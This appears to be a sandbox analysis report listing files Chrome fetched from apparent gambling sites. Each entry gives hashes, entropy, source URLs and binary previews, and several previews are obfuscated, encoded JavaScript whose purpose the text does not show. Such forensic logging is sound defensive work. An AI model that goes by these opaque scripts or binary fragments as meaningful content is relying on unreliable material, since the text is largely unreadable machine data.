                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 18388
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4084
                                                                                                                                                          Entropy (8bit):7.94569233466241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mwcWOzIzqP0Drv6oQckG8NF/xiWqpvCkxpR:RwIzXscRqRxiWkTpR
                                                                                                                                                          MD5:106BA6DD5A7918BDB0DD73A4594C5684
                                                                                                                                                          SHA1:5DA4B04A3D47B087CDC723C63606CCD53D61C52F
                                                                                                                                                          SHA-256:4BE1B19DD11804094ACA2A4C9E62C22AFD21B14EAFFCA0874E87A3441BE04966
                                                                                                                                                          SHA-512:1B1589144CCB52B8F53C0D6862E626808F70748B3F4E3DCB950F985A8C2200E7CE7FAD056AC6645FAD84063178DC517FAAAC7ADC2EF18BA20D19666C8CA3833E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/zbw?r=8525137558
                                                                                                                                                          Preview:...........WKo.6.>o~E.^c.....E.=t...........E.....z.R..zk` ...7.of......J..=..*E.r].=t..(..R..o.b.m.%.N.....&=|8.C/.I ....N.....P......_.o....7._P..N...=........=......$..*..jc...^..........._.>....f..s...u).}".H......t}:].YO^+.C..K?=....p.CD=._......%.{.Y'Y(.4..'..K...aV..]!6....Y!.*.e.EY.K./(.-h.t.._.\.f....C..=..K.~rV6......i..h.x~.{2U.G.....T..n..j.~.^:........s..U`N]}j1.T%....)7.u.6G..y8.....@.H..zz|...y"...DZTJ.}.'d.I......eQ.~..X*..Q.>.NO...avi......gA.V.O.\...O...."K<..%........,....w.V&...gA.k..L.K....!3....y..Y.WG...d;l0...go_.HxU.......b.|..(.f^.JE....=w<..i...q~%.<..G}.r..3..U.e)..;...DX.-.r.g.3....aKB.I..Xhy.R.b......W.......K....:p......y8.a...%`..n..E`e..JyA..R`lwK...........,....u=.l..>f. .~....._....z...7.Nwow..s..S..s....,..m....{+<h.....v/.'.%a...dd....Z.Pq..0.`~Cg.wx:.".-@0.I>..a.S.A.PLL.s.....309......)..:......s.X.D....w#h.[m.m.y....0.% .Iv.a+..D.. ..N....S../.BM..........gd..2.s.5..v..lg.c.;.....v..`...;.1_..C...2..0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13569
                                                                                                                                                          Entropy (8bit):7.9542641928161375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:wd2YWEpHwmCOHVTe0wschjx0NQgy3cWShvmHA:wdNF9BCOHVTeDRx0egysXvmg
                                                                                                                                                          MD5:61328DC3D6BBA41D86D4852CDBD80A06
                                                                                                                                                          SHA1:D9FD0CAEDF4CE0B4FD097AEFB3B08FE320F53458
                                                                                                                                                          SHA-256:01160ABD9D13162B1C0E91A286A4A6B3DB263DBFBC96F4A708965DA78C03C471
                                                                                                                                                          SHA-512:ADE51B73B14B4F58240347F36C241418B935E922276ECD1AC059B15FBA73E5CA7A4AB71B9C36DC90A9AADEC46E72AC0E718A770809D3ABB76554D7CA59ADA348
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:C17C32078D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:C17C32068D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24
                                                                                                                                                          Entropy (8bit):4.1887218755408675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:uuKln:uu4n
                                                                                                                                                          MD5:356555E64410CB07748C013C7862421C
                                                                                                                                                          SHA1:9FC2E0D7B2297CAB2DD4824D42BB20AF8CE1B6FE
                                                                                                                                                          SHA-256:9BF353A4E2B515DA809F62D31F61F5FD659AB8FFA04E1AC7A3304F2B05510748
                                                                                                                                                          SHA-512:0A14AE03555EBA744339B7632B8F5D382F60232499BC4D773D88DBDB7E3FAEAB7CC2815477EF59A68D500E648F977ECB68EA03D9DC9CB88FAD7201F2876D9A7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:....(empty-777).
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1091
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):698
                                                                                                                                                          Entropy (8bit):7.691593796397796
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:Xyu6WcCGBYj0I5lMXz2lx5XPYMB+RC+9fgOWYAuoRact6liYe1ZADA:XyuNz+Yj0Iq2v5Y/C+nKuoQctXMDA
                                                                                                                                                          MD5:C04D3D132DFFB265CC02B82F7E6F0D28
                                                                                                                                                          SHA1:C946FCAECBF25B126067EA24DD039D4F50341ADD
                                                                                                                                                          SHA-256:F39FCDA4216C4984221FCE3796DE429A8B04804F72FC83611AB6A1CFA65FBD4E
                                                                                                                                                          SHA-512:12FF86632722ACAC68EBA4A00ABE39DF10A6146CDBA147F0A295C3987654C539D266CBAD3AF30449EE8F89E527E8F8A7AA41DF8C43C5C07390F6A24F6531DE8E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-341.dalianjrkj.com:1586/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&terminal=1&r=6219241436
                                                                                                                                                          Preview:..........|..o.0.....Q.M..6].mE..j...4....^.'u...v..G..$........?........di.8`)...>.}.rf..>4......0..0).p..k...\..V.t.:.....#...k4...e&.NFxP.. |xT..T..PQ.Sa0.|..,.>...Q....4..Rvo..9.QS..5.@..1E..z....=..y.R.<Oz.45.R:.l.^+-/j.IJ=c..T..t.){..#2..X..W...*.....K@.v.[..M.i.P*..n^..3`"..tZ....*i.XbJ.=....`{.T..SBn;..R..~..F=.I5..~HHX...u...>*m..d.Lt......o...*..........F.....-.Q>.T......5.C....l..K......."...~.kC......D.....w.<....4..U..2b...........M.Z_...~.$R.\.h.{...y....y....K.....W._.>....m.q...{..L.v.........`.[..k^.....1.V.y.J....yf..'h...H....0....AF...J.}.T.4..a...L...4..U3.........v....Wk..z.~n...'.....?G......W..7.F......F..H.....*..2E.....[..........C...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):28
                                                                                                                                                          Entropy (8bit):4.307354922057605
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:WZoS+Nhn:WZoSyh
                                                                                                                                                          MD5:A2432DC721D79CB02E73D270CE7E1EAA
                                                                                                                                                          SHA1:5A3C7BE77E9108ACA1B39E6BCD336EAAE6A51080
                                                                                                                                                          SHA-256:CE43C8C02C05A92B3E20FAB138AAD31B9FD54B92848913449D09924E839BB80E
                                                                                                                                                          SHA-512:0091B8D2F943169BDF1DD01D07A31F683F3B353D4EAADF1F7973AA79A989E349F53D6518AC612A856D89AB1539923C9FFAABB13E7CF8BEDF450E128342FF3298
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmzv1MHoIGNghIFDZFhlU4SBQ01hlQc?alt=proto
                                                                                                                                                          Preview:ChIKBw2RYZVOGgAKBw01hlQcGgA=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1200 x 1030, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):663866
                                                                                                                                                          Entropy (8bit):7.990888498948623
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:12288:D3hdblOdJfMslya9n61lNsCOFv2RQJzBTjP5sjPpDc8MmP7AdV:Dx6/fXAY61LsbFv+WBn5sjPpDRyV
                                                                                                                                                          MD5:5078398AAF522FD02D8EAFC917E5B298
                                                                                                                                                          SHA1:0DF3D76BF1EBAE5AB15E41F3657B113824B59815
                                                                                                                                                          SHA-256:3DD39AA5D4C3DBC88223F8ABC9A083F774A2966606F4EB6D5D5F189F9541041D
                                                                                                                                                          SHA-512:5C65FA8108656C5290A238CCC5A78D4EB8755F4502C4DBA24D1BD9EFAC71B98CA5C99510720366CB3CAEA88672F8EFEABF5C1C4F703AE508D77CB7521ABC7C05
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............'.C.....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:2a20a322-abb0-7d4b-a314-8499dce09f12" xmpMM:DocumentID="xmp.did:10337EB2A1EC11ED9CCBFD27EAD60A42" xmpMM:InstanceID="xmp.iid:10337EB1A1EC11ED9CCBFD27EAD60A42" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5f260e3d-5a7a-994a-a15c-6f0e538cf2ff" stRef:documentID="adobe:docid:photoshop:57c92997-44a1-d946-80ab-fc529bdf8d45"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>. ;....IIDATx..k.-
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1380), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1380
                                                                                                                                                          Entropy (8bit):5.793775006412735
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VVlWw08EXYm/ZwDk5lOAO5HaNu9IRq0tjlIYtTm1qWG:VfWNIm2aIjHchjbm1k
                                                                                                                                                          MD5:04509D505B3AAFAFA9B91C94562074E8
                                                                                                                                                          SHA1:154785DE37CA0817F6449EF868436F7178E6E761
                                                                                                                                                          SHA-256:FF397F56C58A8E85397EADD86F51FE249DDD18C472255F40A9D0B6165ADCE251
                                                                                                                                                          SHA-512:77F5F7BB6E1848AD76ECF5FCE04227573D18B0813D2FC0299717EA5FE54F69BF442B0BC134F816C88617D3BA85ABC4D77E93BB693C34A5B1EC0D945F5BD45D5C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/inside.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgEYBdAGgG8AlAMWoGEAuAMwFc0YAXAS3UxFLQBKcgF9SAc0IAPNMzaceaPgNIdhAIhZIQAAiQcATl07qA3AHkwAKxCcAdABMQTLmhAAFAygggDHAJ6YaKTqAPqhIEgAsigOLAA2IOoUAG5Q8SwgDACEAAwigqZpBjpcALwcmOq5MBBM6oKkSGXkaFAAtlnqrkhcTskQXhBIDNjq3J0G6mQwKO0Q6CBoHCPks/MAciDAI6zs3LzCBiAcLAZoOhx2IJi4ABz4gnYcABZLmFdgrg5BCfEhMAAQgA1QENQQiMQOKAcKByfaKTBHE5nNDkLjtcSAqDaBhcRzOKAJK50dD6KDLOwwBxoAASKH0AGp1AB6DFQcQgAC0EBgbLQvScLOS8S4+gYogE2wAyi8UMAGLkmnKFXlSO0UF9ElsdiqcoQmgYYAx1OpIaRgDCYC8JQASLwsDhZPYKXj8ITkYqXCovMWmEB2NqdbJlNCBjogABkkY+vqQdiQKrK2QN2g4ABUMSAUI7MC6DkphFckEayupYNwUlwAuoyhU7Pac07w50APzqQZzFDqBhXRuOgNB/jFpN5MSvMXPLMGVsbFjtMC+WOTia+QQMADMAFZcoIIWJ1hABw4JYn5TEtSBsWg3AZ4a7C+RjqdzlUNZf1CGJ/GSzAAD5/tk352O+XDatsZ7AII0ZVHKnSfnWwG/tGwGivo2BIUaxD7qQMDHDCIAnvmiLCF6IA+mKAhlMA3zynY0oANIAJIbKYlTqIQACCVjiA0VR2MKjJoMy/JOFIdhWEgDTPG8SjEbwHoBrabhSBmxhwHm8gFki5ABmhHChnYPR9FeFK3tGYbGU4163kZTrtABkqDjKSaWQKJk2b4FlGe51lmb4gYQQBSoBr+ZRKQ6zZDqQAageBuryoZcUgDqkEASmBSZWIKAtMcaBOHe8mPmRFFIFRSl4SABEAKKJJ0yyqO
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 54 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2340
                                                                                                                                                          Entropy (8bit):7.534024479840203
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:tzvn00tw0WSJ3vEpn15zo5dyl+KP+Jjns4gvoR/X:Z0060WIEv5zidSPyjs4CoR/X
                                                                                                                                                          MD5:B8FBA4CEB377D7A9F2C695C22B507163
                                                                                                                                                          SHA1:EA861D769806A41FBDADB46B977A56F79E7055A9
                                                                                                                                                          SHA-256:8064742DE9788C682C6AFB89CEFA9E1A0C37999E4BA886C998855A6D131B772C
                                                                                                                                                          SHA-512:66AE2290F706F0D9DFB74BDDDE0408426E1B1CA1843A87C250B49A3298B97F12C4FE241980B7F8B5EE2DBDBA28E40FC18F7C7E52C42871D1C5F005B53BAF6DF4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/footer/icon_slot.png
                                                                                                                                                          Preview:.PNG........IHDR...6...6......Ej.....tEXtSoftware.Adobe ImageReadyq.e<...)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:D1E20A4521F511EE95B3B3F5D30ADB92" xmpMM:InstanceID="xmp.iid:D1E20A4421F511EE95B3B3F5D30ADB92" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3210364CF3A111E7AA4B8783A4658FA7" stRef:documentID="xmp.did:3210364DF3A111E7AA4B8783A4658FA7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..Zkl.U....i...ZhI.......T.IcH..P...V.........$.|'..&Z.!i $h..1........t..R.Y(e........:].1;3.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (8744), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8744
                                                                                                                                                          Entropy (8bit):5.932552425919391
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:VFygi0OSf6QzoU31aBkZ/720B21KzMpFEvtlAPNcSebQJhw25dB5Vt:VFygn6QzFgBkh7ZU1VUolcSe07HVl
                                                                                                                                                          MD5:829F0DF1F1036894C109D14213723407
                                                                                                                                                          SHA1:4BD0CECAB8B5CFF27AD12AD2F55961BDC2E67C1F
                                                                                                                                                          SHA-256:BE5099A447276D5C307D9EBB5C22472B55023D58C352D87E3D26DA75681BA0EF
                                                                                                                                                          SHA-512:EB03E1D1E1AF89C1ED54F45FC82C08926CCC59F0FAADB19B951C34AA8E6A3F82C2D52BC8CBCD159FFCABD1126E52C143F8C2596FC23390E442B4B98C1C3BF17B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/news.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgE4BdAGgG8AhEAFwBkAuAMwFc0YaBLdTJUmgJTkAvqRiUAapWZsO3NL36k0QgEQskIAARIaAJ04dVAbgDyYAFYgOAOgAmIJpzQgACnpQQQemgE9MNKSqAPrBIEgAsih2LAA2IKoUAG5QsSwgDACEAAzCAsYpelogALwKqgC2SQASAIqqAqScZTYKII0oZZiqACJ2+MANpMAtCiiNel2q2ZyuABZDUKOYeo0wUz0sAPS4Q7FTAHIAmgAepkMsU9kwEExDEFNbSQDiACxDc8sQjXYlmMCYASYESkcxWDiYWI2CpQCARFg0KBcdBIIHkTQ0CJIADmDBgNmeeQoEE8LAgBxAwCQMnYyIUQk4TEwmWAzjsKGArUpSFcpO+5EKOhKNDmnCQXKpAEk0EwULyIGTjIzMNlMiVxfE0NiRUJBTQSuQKjiAMpzDlZbKkI3YgAqnBo8QYIrF0JxdodICtOMo0V8DD41oAwrEoEhqaoXFT5YkkGbgHRHDQKVS6GKaBbSCSFRAAGIh3GqI6qYTGVlodmcyM8vklHL8UXijFY7EBATCdukWMc5PU1i0+S8XVQIr67DEYzO8VV6Wy6GwzB9uQ8FTkPS0Fh6NBaNA2LNkvNQbEldUAMhPNF3GjmwK4HoYO9v8TE6BoIDQ6Z3MBfb8CumHNDtCoMh3P8fEAkAiVUYt8kFNADWtU1zTra13UdSdXVte0n2tH07D9X84wTJgk25VNdAzPdc3zf0S3QpscUwFRRAcL8HGqGgKliGklwUVEBWHLR9XZGAWCA98bBgNckRAABReIxJoboeklCQGmMNcaA3LcL2cFw9GqG0IjodV+BsV8ThoQNv3fAAfGydLQPSbRACzRBgWIUE0HtuLpQFyHQsVEJGTIAEZRGxWgexnFAfIHIciiQYUGyVJkAqQOgUGxZwzxYexHCgOILwAVS4KExUoEM0DgAIGxsDysrQ
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 22006
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7599
                                                                                                                                                          Entropy (8bit):7.968812814531643
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:UCnHGpv0J0C/Iy2hh3zrHg+Gd7mhLabhwHp0KuClDpEclAdCX+gZc:UCnM0Jz/Iy2LrHgz7WL0qplINic
                                                                                                                                                          MD5:84191D1091731FC35BABF501FF6A08BF
                                                                                                                                                          SHA1:13F401266FC74700486A120BB0DF31E00152F492
                                                                                                                                                          SHA-256:51BAE893893C406293BF77A7D6B84E7741607005BD99A64BC9E9BE8F3A2A13F0
                                                                                                                                                          SHA-512:767A734B8FE2EAF78FADB068CE5629DC20BC917E87C6D954FFC3E36E8386DE6B3FA4306C1AC690F7E0562FCB97338C80AAE94B7B98C233C21E1A842147117817
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/layer.js
                                                                                                                                                          Preview:...........<.n.Hr...2.".+..d.=C..ffg..fs..A..Z........-.x-.I.(y..A....erH.#U...(..&0`.?.]].U...Nzy.....y0.........../...........y...>KYQ.^o..&:;.......\..z..z.........Wg...,.E..p..Gg./..R.L......L....l.../..;....U.G...-./.t.f....6..y.f0.+..j8..Y.mU:....`......r.:kV.1..*.U..z{.@.wn.g.K......7K.9s........2....>+...........-y4.....fN.W..._....W/^N......}.U._?.>q.>..0..........lY%k|..d.P...65.....?.A..3.....n...B].v1b....z.(XP..[l..H<......*7......[6u.5N..t.n...<+>Z@.........O@.4T.......W.........%...s.n...K8..].'r..#...1.\..y.".<.<v..{A.6y.2...`.....8........ ..8...5.aT.K.b.;~..*........"^..kx..n............*..n...B........Z`.0Ho..S.bT.e..}....*+....0G.w.}.g..........q.o..f..Ge...=...|..|.R0.\/.....Y........,....*~.........$.H...U..]....x.....I.\.^''..^.........|.s....=...]......u...k....;.....l4..F#.d2#.#...~_>....{.b......E...*I2?..n.B.(N....@..}.@S..U..<_...G..N......(.:.......a....1Y<..U...L.vL.....b.b..*t.3P==X1J....P.l..*.....Jq........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 411 x 178, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):120577
                                                                                                                                                          Entropy (8bit):7.994355950919736
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:3072:vboBLGQI9PI0tFjCltnZ4qesx67INo5ZIUIKTNf8zoeAMZMKgt:vbUy79CB2qesMIW/PIANEzoeFMh
                                                                                                                                                          MD5:960374D51228E8F5DD176DD037CD6982
                                                                                                                                                          SHA1:1BDBFE746EE79FB078E1D1412F5718578713F006
                                                                                                                                                          SHA-256:DD6B3C3B7B820FAF5FE29089682D36DDFF69FF1E0DDF1D6A08C931521E74E077
                                                                                                                                                          SHA-512:FF94B129E1FCAF056A8DC96A6E9F754F4C995B40B41361041C631EBE51145543512BC19A3B93052F513C569A3A7E472E3A75C3DF27D654B87E676819C2FF911C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/eSports/02.png
                                                                                                                                                          Preview:.PNG........IHDR..............Lb.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:E32F6013CDEB11E9B43192D3A21143E0" xmpMM:DocumentID="xmp.did:E32F6014CDEB11E9B43192D3A21143E0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E32F6011CDEB11E9B43192D3A21143E0" stRef:documentID="xmp.did:E32F6012CDEB11E9B43192D3A21143E0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>*,M....qIDATx..}...gu..{..E..UoV.0.%......./..K.%...I..........i6....,K.l...j.}wvvz........ZY.5..?;;;.....}.=.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):44921
                                                                                                                                                          Entropy (8bit):7.9899108745753455
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:q1dZvdthNWPN7rYhroyNAjE5uwce+WxNpJaEsKIspEc9hR0X3lS9a2l:q1nzhOvY1oyN6E5pHkVKIsqyhWXVol
                                                                                                                                                          MD5:EABEFC7519CDE537005FF76DA350D649
                                                                                                                                                          SHA1:DC396BB7A311B37BACF036B51A27435EDA060230
                                                                                                                                                          SHA-256:2779C3209EDB3A5B918941FB6E881DDE64CF584DBB1A4C6FFD2C2CE07BBA7AC6
                                                                                                                                                          SHA-512:E0B8075B311654E09548735DDB665AEA7394FBBF727CC5B149DB810CEFD3BFB3C1D65A766CCCADED025491E78D37EDB7088269470EB78D3866044472EA5078CB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:702434ABCDEB11E99A67CCA56C2E3EC2" xmpMM:DocumentID="xmp.did:702434ACCDEB11E99A67CCA56C2E3EC2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:702434A9CDEB11E99A67CCA56C2E3EC2" stRef:documentID="xmp.did:702434AACDEB11E99A67CCA56C2E3EC2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..sX....IDATx....\.u6|n.^..I..K.!0.Sm0`06nq.mp...N.~.?...Kb.~..&.........@B ..z...2}....=..;.]....i...2..;...s..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
